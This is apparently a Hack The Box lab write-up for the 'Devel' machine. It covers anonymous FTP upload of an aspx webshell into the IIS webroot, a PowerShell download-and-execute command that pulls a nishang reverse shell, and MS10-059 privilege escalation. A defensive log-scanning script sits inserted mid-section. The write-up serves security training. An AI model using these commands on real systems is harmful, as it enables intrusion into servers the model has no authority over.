# 🕵 HTB-Writeup : DEVEL
## Recon
**nmap**
```shell=
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
A Windows machine running Microsoft IIS 7.5 and a Microsoft FTP server that allows anonymous login.
**Dirbuster**
The Dirbuster scan does not find any directories or files.
Tested extensions:
- php
- txt
- xml
- sh
- asp
- html
**ftp server**
As nmap's `ftp-anon` script shows, we can log in to the FTP server as the anonymous user.
```shell=
└─$ ftp anonymous@10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
```
But we can't find any interesting files there.
Since neither scan turns up directories or files, I decide to look for vulnerabilities on the FTP server itself.
First I mirror everything the anonymous account can read. Again, no interesting files.
```shell=
└─$ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.5
└─$ tree 10.10.10.5
10.10.10.5
├── aspnet_client
│  └── system_web
│  └── 2_0_50727
├── iisstart.htm
└── welcome.png
```
I try to brute-force accounts with nmap's FTP NSE scripts. No results.
```shell=
└─$ nmap --script ftp-* -p 21 10.10.10.5
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 50009 guesses in 317 seconds, average tps: 145.0
```
Re-checking the downloaded files, I realize I had missed an important piece of information: the FTP root is the IIS webroot. The `aspnet_client` directory is a standard IIS folder, and navigating to `http://10.10.10.5/aspnet_client/` returns an access denied (not a 404), so the FTP server and the IIS server are serving the same directory.
## Vulnerabilities
Knowing that, we can try to upload a file through FTP and have IIS execute it to get a reverse shell.
I upload an `aspx` webshell over FTP so I can execute PowerShell commands. The webshell can be found at `/usr/share/webshells/aspx/cmdasp.aspx` on Kali Linux.
Then, I prepare the **nishang** reverse powershell script that can be found [at this link](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1).
I add the following line to the bottom of the script, with our IP and port (the values are left blank here); `Invoke-PowerShellTcp` is the function the script defines.
```ps1=
Invoke-PowerShellTcp -Reverse -IPAddress -Port
```
Then, I start a Python HTTP server serving the PowerShell script. From the webshell, we download and execute it (host and port are left blank here):
```shell=
# on aspx command prompt
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://:/Invoke-PowerShellTcp.ps1')"
```
*Command injection on the form*
*Response on our host*
It works! We get a reverse shell!
```shell=
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>
Directory: C:\windows\system32\inetsrv
PS C:\windows\system32\inetsrv> whoami
iis apppool\web
```
We can get the user flag. Let's move on to privilege escalation!
## Privesc
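From the defender's side, the weakness exploited above is an anonymous-writable FTP root that is also the IIS webroot. The following is an added example, not part of the original writeup, that flags successful uploads of server-executable files (and, optionally, any write by the anonymous account) in an IIS FTP W3C log; the log lines and the `10.10.14.2` client address are constructed for the example.

```python
# Constructed sample of an IIS FTP W3C log (not captured from the box). The
# "#Fields:" header names the columns, as in real W3C extended logs.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2017-03-18 02:06:11 10.10.14.2 anonymous 10.10.10.5 21 USER anonymous 331
2017-03-18 02:06:11 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230
2017-03-18 02:06:12 10.10.14.2 anonymous 10.10.10.5 21 LIST / 226
2017-03-18 02:06:30 10.10.14.2 anonymous 10.10.10.5 21 STOR /cmdasp.aspx 226
2017-03-18 02:06:45 10.10.14.2 anonymous 10.10.10.5 21 STOR /notes.txt 226
2017-03-18 02:07:01 10.10.14.2 anonymous 10.10.10.5 21 RETR /iisstart.htm 226
2017-03-18 02:08:15 10.10.14.2 deploy 10.10.10.5 21 STOR /welcome.png 226
2017-03-18 02:09:02 10.10.14.2 deploy 10.10.10.5 21 STOR /blocked.aspx 550
"""

# Extensions IIS hands to the ASP/ASP.NET handlers instead of serving as static content.
EXECUTABLE_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".config"}
# FTP commands that create or rename files on the server.
WRITE_METHODS = {"STOR", "STOU", "APPE", "RNTO"}

def parse_w3c(text):
    """Yield one dict per data row of a W3C extended log; '#Fields:' names the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def suspicious_uploads(text, flag_anonymous_writes=True):
    """Return (client ip, user, path) for every successful (2xx) write of an
    executable file, plus every successful anonymous write if requested."""
    hits = []
    for row in parse_w3c(text):
        if row["cs-method"] not in WRITE_METHODS or not row["sc-status"].startswith("2"):
            continue  # reads, logins, and failed writes are not interesting here
        path = row["cs-uri-stem"].lower()
        ext = path[path.rfind("."):] if "." in path else ""
        anonymous = row["cs-username"].lower() == "anonymous"
        if ext in EXECUTABLE_EXT or (flag_anonymous_writes and anonymous):
            hits.append((row["c-ip"], row["cs-username"], row["cs-uri-stem"]))
    return hits

if __name__ == "__main__":
    for ip, user, path in suspicious_uploads(SAMPLE_LOG):
        print(f"suspicious upload from {ip} as {user}: {path}")
```

The failed `STOR /blocked.aspx` (status 550) is ignored, which is the behaviour you want once anonymous write access has been removed and only reads succeed.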
I first collect the output of `systeminfo` and feed it to the [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) tool.
```shell=
└─$ python2 ../TOOLS/Windows-Exploit-Suggester/windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo -l
[*] initiating winsploit version 3.3...
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] searching for local exploits only
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*] done
```
It gives me three potential vulnerabilities. I found [this GitHub repository](https://github.com/abatchy17/WindowsExploits) that lists multiple Windows exploits, and I try the third one listed by the tool (**MS10-059**).
The **MS10-059** vulnerability allows an attacker to run code with elevated privileges. It exploits incorrect access control lists (ACLs) on the registry keys for the Tracing Feature for Services.
I copy the program onto the machine through an SMB share, then execute it.
*Commands executed on the target*
We get another reverse shell! This time with SYSTEM privileges!
*Reverse shell gain on the host*
## Tags
Easy, External, Network, IIS, ASP, Penetration Tester Level 2, Remote Code Execution, Unrestricted File Upload